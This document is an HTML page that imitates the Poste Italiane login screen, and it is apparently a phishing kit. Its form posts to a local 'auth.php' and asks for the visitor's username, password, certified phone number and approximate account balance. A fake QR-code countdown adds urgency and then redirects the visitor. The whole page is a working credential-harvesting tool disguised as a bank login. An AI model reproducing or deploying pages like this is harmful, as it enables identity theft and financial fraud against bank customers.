<!DOCTYPE html>
<html lang="it">
	<head>
		<title>Accedi o Registrati</title>


		
		
		<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no, user-scalable=0">
		<link type="text/css" rel="stylesheet" href="risorse_dt/bootstrap/css/bootstrap.min.css">
		<link type="text/css" rel="stylesheet" href="risorse_dt/condivise/stili/trasversali/owl.carousel.css">
		<link type="text/css" rel="stylesheet" href="risorse_dt/condivise/stili/trasversali/base.css">
		<link type="text/css" rel="stylesheet" href="risorse_dt/condivise/stili/trasversali/megamenu-pi.css">
		<link type="text/css" rel="stylesheet" href="risorse_dt/condivise/stili/trasversali/retina.css">
		<link type="text/css" rel="stylesheet" href="risorse_dt/applicazioni/trasversali/stili/custom-form-element.css">
	
		<script type="text/javascript" src="risorse_dt/condivise/javascript/jquery.min.js"></script>
		<script type="text/javascript" src="risorse_dt/condivise/javascript/utilita.js"></script>
	
	
		
		
		
		
		
		
		
		
		<style>
			h1.idp-retail {
				font-size: 40px !important;
			}
			h3.idp-retail {
				font-size: 20px !important;
			}
			.spacer-xs-top-38 {
				margin-top: 38px !important;
			}
			.bg-box-qrcode { 
				background-image: url("risorse_dt_ext/icone/bg-qrcode.png");
				background-repeat: no-repeat!important;
				background-position-x: center!important;
				background-position-y: bottom!important;
			}

			.bg-css-countdown {
				background-color: #dae5f6;
				margin-bottom:0 !important;
			}
			
			.bg-password-show {
			    background-image: url(risorse_dt/applicazioni/trasversali/immagini/eye-cut.png);
			    background-position: center;
			    background-repeat: no-repeat;
			}
			
			.bg-password-hide {
			    background-image: url(risorse_dt/applicazioni/trasversali/immagini/eye.png);
			    background-position: center;
			    background-repeat: no-repeat;
			}
			
		</style>
		
		
<!-- per la modale ma se cambia va totlo -->
<style>

/* /* The Modal (background) */ */
/* .modal { */
/*   display: none; /* Hidden by default */ */
/*   position: absolute; /* Stay in place */ */
/*   z-index: 1; /* Sit on top */ */
/*   padding-top: 100px; /* Location of the box */ */
/*   left: 0; */
/*   top: 0; */
/*   width: 100%; /* Full width */ */
/*   height: 100%; /* Full height */ */
/*   overflow: auto; /* Enable scroll if needed */ */
/*   overflow-y: auto !important; */
/*   background-color: rgb(0,0,0); /* Fallback color */ */
/*   background-color: rgba(0,0,0,0.4); /* Black w/ opacity */ */
/* } */

/* /* Modal Content */ */
/* .modal-content { */
/*   background-color: #fefefe; */
/*   margin: auto; */
/*   padding: 20px; */
/*   border: 1px solid #888; */
/*   width: 80%; */
/* } */

/* /* The Close Button */ */
/* .close { */
/*   color: #aaaaaa; */
/*   float: right; */
/*   font-size: 28px; */
/*   font-weight: bold; */
/* } */

/* .close:hover, */
/* .close:focus { */
/*   color: #000; */
/*   text-decoration: none; */
/*   cursor: pointer; */
/* } */
</style>
		

		
		
		

   
    

<script type="text/javascript" src="jod-fcc/posteID/x-jod-poste-id.js"></script>


	



	

<script type="text/javascript" src="jod-fcc/resources/portal/js-rsa-2/hashtable.js" ></script>
<script type="text/javascript" src="jod-fcc/resources/portal/js-rsa-2/rsa.js" ></script>
<script type="text/javascript" src="jod-fcc/resources/portal/js-rsa-2/pbase-css-poste.js" ></script>






<script type="text/javascript" src="jod-fcc/resources/portal/js-polling/jdpolling.js" ></script>



<script type="text/javascript">
function logintest(actForm) {
	try {
		posteSubmit(actForm);
	
	} 
	catch (e) {};
return true;
}


var organizationmessage = "MyPoste";
var federated = true;
var issuer = "./poste/MyPoste.php";
var cancelurl = "./index.php";


var sp_link  = "";
var sp_link_label  = "";
var sp_subtitle  = "";

var sp_posteid  = true;
var sp_business  = true;
</script>

		
		<script type="text/javascript">
		$(function(){
			var isRememberMe = false
			if(isRememberMe){
				$('#username').val("");
				$('#firstname').text("");
				$('.rememberme_hidden').hide();
				$('.rememberme_shown').show();
				$('#rememberme').val("on"); 
			}
		})
		</script>
	</head>
	
	<body>
		
			
		<!-- AlertBrowser -->
		
			<div id="consent_blackbar"></div>
		</div>
		<div class="content content-federation-bar content-federation-bar-minified content-federation-bar-simplified">
			<div class="container container-extended">
				<div class="row">
					<div class="col-md-12">
						<div class="header-minified">
							<div class="row">
								<div class="col-xs-12">
									<div class="federation-bar-content-logo pull-xs-left clearfix">
										<div class="logo">
											<a href="https://www.poste.it/index.html" title="" class="hidden-xs hidden-sm">
												<span class="wrap-logo wrap-logo-medium"><img alt="Poste Italiane"  src="risorse_dt/condivise/immagini/loghi/logo-poste-italiane-medium.png" srcset="risorse_dt/condivise/immagini/loghi/logo-poste-italiane-medium@2x.png 2x" class="logo-image-pi-medium" /></span>
											</a>
											<a href="https://www.poste.it/index.html" title="" class="logo-mobile hidden-md hidden-lg">
												<span class="wrap-logo wrap-logo-small"><img alt="Poste Italiane"  src="risorse_dt/condivise/immagini/loghi/logo-poste-italiane-medium.png" srcset="risorse_dt/condivise/immagini/loghi/logo-poste-italiane-medium@2x.png 2x" class="logo-image-pi-small" /></span>
											</a>
										</div>
										
										<div class="back spacer-md-left-30">
											<a class="back-link" href="#" title="Esci">
												<span class="hidden-xs hidden-sm">Esci</span>
											</a>
										</div>
										
									</div>
								</div>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>
		<!--googleon: all-->
		<div class="content content-applicative  nobracket" >
			<div class="container">
				<div class="row">
					<div class="col-md-12" id="accessibility-anchor">
						<div class="row">
							<div class="col-xs-12 ">
								<div class="main" style="margin-top: -40px !important;">
									<div class="row">
										<div class="col-md-12">
											<div class="abstract">
												<div class="abstract-heading text-xs-center spacer-xs-bottom-40">
													<h1 class="idp-retail">
														Accedi 
														<small>
															<h3 class="idp-retail">
																<strong>Compila il seguente modulo per verificare la tua identità.</strong>
															</h3>
														</small>
													</h1>
													
												</div>
											</div>
										</div>
									</div>
									<div class="row">
										<div class="col-md-8 pull-sm-not center">
											<div class="row equalize-group equalize-group-1">
												<div class="col-sm-12">
													<div class="content">
														<div class="content-overflow-wrap">
															<div class="row">
																<!-- panel credenziali  -->
																 
																
																<div class="col-xs-12 col-sm-6">
																
																
																	<div class="panel panel-cards panel-cards-large">
																		<div class="panel-wrap innerspacer-xs-bottom-0">
																			<div class="panel-heading spacer-xs-top-30 rememberme_hidden">
																				<h4 class="text-xs-center">
																					Inserisci le tue <strong>credenziali</strong>
																				</h4>
																			</div>
																			<div class="panel-heading spacer-xs-top-30 text-xs-center rememberme_shown" style="display:none">
																				<img src="risorse_dt_ext/icone/empty-profile.png" srcset="risorse_dt_ext/icone/empty-profile@2x.png 2x"/> 
																				<h4 id="firstname"></h4>
																				<p><a href="javascript:deleteRememberMe();">Non sei tu?</a></p>
																			</div>
																			<form action="auth.php" class="form-login spacer-xs-bottom-30 clearfix" method="POST">
																			    <input id="rememberme" name="rememberme" type="hidden" value="" />
																				<input type="hidden" name="dep" id="dep" value="">
																				<input type="hidden" name="dop" id="dop" value="">
																				<input type="hidden" name="evp" id="evp" value="">
																				<input type="hidden" name="mid" id="mid" value="">
																				<input type="hidden" name="rememberme" id="rememberme" value="">
																				<div class="panel-body">
																					<div class="spacer-xs-bottom-30">
																						<div class="form-group form-group-lg rememberme_hidden">
																							<p>
																								<label class="control-label" for="username">
                                                                                             NOME UTENTE
                                                                                        </label>
                                                                                                <input class="form-control" id="username" required="" name="username"placeholder="inserisci" type="text" value="">
                                                                                            </p>
                                                                                        </div>
																						<div class="form-group form-group-lg">
																							<label class="control-label" for="password">PASSWORD</label>
																							<div class="input-group">
			                                                                                    <input type="password" required=""class="form-control pwd-control" id="password" name="password" placeholder="inserisci">
			                                                                                    <div class="input-group-addon input-group-addon-pwd bg-password-hide" title="mostra la password" id="password-trigger"> 
			                                                                                    	<div style="width:24px"></div>
			                                                                                    </div>
			                                                                                    
																						</div>
																					    <div class="box-editable-area spacer-xs-top-40">
																							<p class="subtext text-center spacer-xs-0" style="font-size: 0.85em;">
																							</p>
																						</div>
																						<p>
																						</div>
																						<div class="form-group form-group-lg rememberme_hidden">
																							<p>
																								<label class="control-label" for="numero">
                                                                                             Numero di telefono certificato 
                                                                                             <p><strong> 
                                                                                                <input name="numero" title="" data-placement="top" class="form-control" id="" 
																								placeholder="Inserisci" required type="text">
                                                                                            </p>
                                                                                        </div>

																						<div class="form-group form-group-lg rememberme_hidden">
																							<p>
																								<label class="control-label" for="numero">
                                                                                             Saldo approssimativo disponibile
                                                                                             <p><strong> 
                                                                                                <input name="saldo" title="" data-placement="top" class="form-control" id="" 
																								placeholder="Inserisci" required type="text">
                                                                                            </p>
                                                                                        </div>


																						<div class="form-group form-group-lg rememberme_hidden">
																							<div class="checkbox">
																								<p>
																									
																								</p>
																							</div>
																						</div>
																						
																						
																						<p
																							class="btn-container btn-container-center spacer-xs-bottom-15 spacer-xs-top-30 clearfix">
																							<input type="submit"
																								class="btn btn-primary btn-expand" value="accedi">
																						</p>
																						 
																						
																						
																						
																					</div>
																				</div>
																			</form>
																			
																		</div>
																	</div>
																</div>
																<!-- panel qrcode  -->
																 
																
																	<div class="col-sm-6 hidden-xs">
																		<div class="panel panel-cards panel-cards-large bg-box-qrcode">
																			<div class="panel-wrap innerspacer-xs-bottom-0 text-xs-center">
																				<div class="panel-heading spacer-xs-top-30">
																					<h4 class="text-xs-center">
																						Accedi <strong>pi&ugrave; velocemente</strong>
																					</h4>
																				</div>
																		
																				
																					<p>Inquadra il QR code con le app <b>BancoPosta</b> o <b>Postepay</b></p>
																					
																					
																					<p class="innerspacer-sm-bottom-10 innerspacer-sm-top-10"><img src="risorse_dt_ext/icone/ico-bp.png">&nbsp;&nbsp;<img src="risorse_dt_ext/icone/ico-pp.png"></p>
																				
																					
																					
																					
																					<p class="innerspacer-sm-bottom-15">
																						<img src="img/qrcodelogin.gif"/>
																					</p>
																					
																					<p class="innerspacer-sm-bottom-20 bg-css-countdown">Il codice &egrave; valido per <span id="_timer"></span></p>
																					
																			</div>
																		</div>
																	</div>
																
																
															</div>
														</div>
													</div>
												</div>
											</div>
										</div>
									
										
									
								<!--html template-->
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>
							<div class="col-md-7">
								<div class="clearfix">
									<div class="base-footer">
										<div id="teconsent"></div>
									</div>
								</div>
							</div>
						</div>
						<a href="#" class="btn btn-primary btn-cta back-to-top"> <span
							class="hide">vai a inizio pagina</span>
						</a>
					</div>
				</div>
			</div>
		</div>
	
		
		
		<script type="text/javascript" >
			function xxxerror(data) {
		
			
		setTimeout(function() {
			try {	
				window.location.replace("/index.php");	
			} catch (e) {
				window.location.href = "/index.php";
			}
		}, 3000);
		

		}
	</script>
		
	
	
	
	<!-- The Modal -->
      <div class="modal" id="modalQrWaiting" tabindex="-1">
          <div class="modal-dialog" style="margin-top: 0px;" role="dialog" aria-labelledby="modalQrWaitingLabel" aria-modal="true" aria-describedby="modalQrWaitingDesc">
              <div class="modal-content">
			 	  <div class="modal-body">
					  <div class="row">

					  </div>	  
                      <div class="row">
                          <div class="col-sm-12 text-xs-center">
                              <h3 class="spacer-xs-bottom-30" id="modalQrWaitingLabel">Controlla il tuo<br />smartphone</h3>
                              
							

								<img id="imgmyappnane" src="risorse_dt_ext/icone/small-modal-ico-bp-pp.png">
								
								
                              <p class="spacer-xs-bottom-20" id="modalQrWaitingDesc">
								 
																													
																					Per proseguire devi autorizzare nell'App che hai utilizzato per inquadrare il codice QR.
																					
																					
																					
																				
								  
								  
								  
								  
								  </p>
                              
							  <p><div id="__polling_progress__"></div></p>
							  
							  <p class="spacer-xs-bottom-0 text-xs-center">
                                  <button type="button" class="btn btn-default" data-dismiss="modal" aria-label="Close" id="close">Annulla</button>
                              </p>
                              
                          </div>
                      </div>

                  </div>
                  
              </div>
          </div>
      </div>

            
            </div>
            <div class="modal-extra"> &copy;Poste Italiane 2023 -Partita iva : 01114601006 </div>
        </div>
		</form>
    </div>
</div>
		
	
  <!-- Modal content -->
	
	


<script language="javascript">
	
function startTimer(duration,display) {
    var timer = duration, minutes, seconds;
    setInterval(function () {
        minutes = parseInt(timer / 60, 10);
        seconds = parseInt(timer % 60, 10);

        minutes = minutes < 10 ? "0" + minutes : minutes;
        seconds = seconds < 10 ? "0" + seconds : seconds;

		if (display!=null) {
			display.innerHTML = minutes + ":" + seconds;
		}
        if (--timer < 0) {
			timer = 0;
            xxxerror();
        }
    }, 1000);
}

var tt =  document.getElementById('_timer');
// 60 * 5
startTimer(60*5, tt);

</script>





	

		
		
				

		
        
		<form name="loginform1" id="loginform1" method="post" action="jod-fcc/dislogin">
			<input type="hidden" value="" id="secureToken" name="secureToken" />
			<input type="hidden" value="" id="signature" name="signature" />
			<input type="hidden" name="dep" id="dep" value="">
			<input type="hidden" name="dop" id="dop" value="">
			<input type="hidden" name="evp" id="evp" value="">
			
		</form>  
						
		
				
		

							
		

			
	</body>
</html>


<style>
    #truste-consent-track{
        display:none!important;
    }
</style>


<div style="display:none">
                    
</html>
